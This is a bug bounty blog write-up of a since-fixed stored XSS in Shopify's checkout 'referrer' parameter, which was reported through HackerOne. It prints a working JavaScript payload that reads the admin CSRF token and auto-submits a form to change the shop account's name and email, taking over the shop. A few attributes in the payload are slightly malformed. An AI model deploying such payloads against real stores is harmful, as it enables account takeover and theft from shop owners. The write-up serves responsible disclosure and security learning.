To keep up with the security companies we often spend some time on bug bounties. That was a very boring weekend till we found out that Shopify has published their bbp on hackerone. By the time i turned back and forth all my teammates were plugged in. We found many cool vulnerabilities like privilege escalation, a few xss’s and a Oauth redirect bypass.
In this blog post I am going to show you guys how I used a persistent cross site scripting to takeover shops. This vulnerability can be easily exploited and any customer/User can takeover the shop.
When a customer purchases any product from a shop in shopify, they will be redirected to a checkout page. While redirected the request is sent with two other parameters. In those two parameters there is an interesting parameter called referrer. This referrer parameter tracks the customers , for example if there is a “buy now” button embedded on http://example.com and a customer clicks on it to buy a product then this referrer value is reflected in the admin panel of the shop as shown in the screenshot below.
So to takeover the shop, a customer has to simply purchase a product from this address with the referrer parameter set to payload
To make it more fun , We wrote a code to add admins on every click. This way one could takeover a shop!
PS: After reporting this vulnerability shopify has started using CSP , as an extra measure to protect their customers from these kind of vulnerabilities. With CSP it isn’t possible to execute inline script.
var xhr = new XMLHttpRequest(); xhr.open("GET", "https://madamcury.myshopify.com/admin/orders", false); xhr.withCredentials=true; xhr.send(null); var token = xhr.responseText; var pos = token.indexOf("csrf-param"); token=token.substring(pos,token.length).substr(30,44); alert(token); document.write("<html><body><form action= 'https://madamcury.myshopify.com/admin/settings/account' method='POST'> <input type='hidden' name='utf8' value='Ã¢œ“'> <input type='hidden' name='authenticity_token' value='"+token+"'/> <input type='hidden' name='user[first_name]' value='hacked' /> <input type='hidden' name='user[last_name]' value='hacked'> <input type='hidden' name='user[email]' firstname.lastname@example.org' /> <input type='hidden' name='_method' value='post'> <input type='submit' value='Submit form'></form> <script>document.forms.submit();</script></body></html>");
We reported this vulnerability to Shopify via hackerone. This vulnerability is fixed now and cannot be reproduced.
Shopify rewarded us with a decent bounty , which made our next weekend really amazing.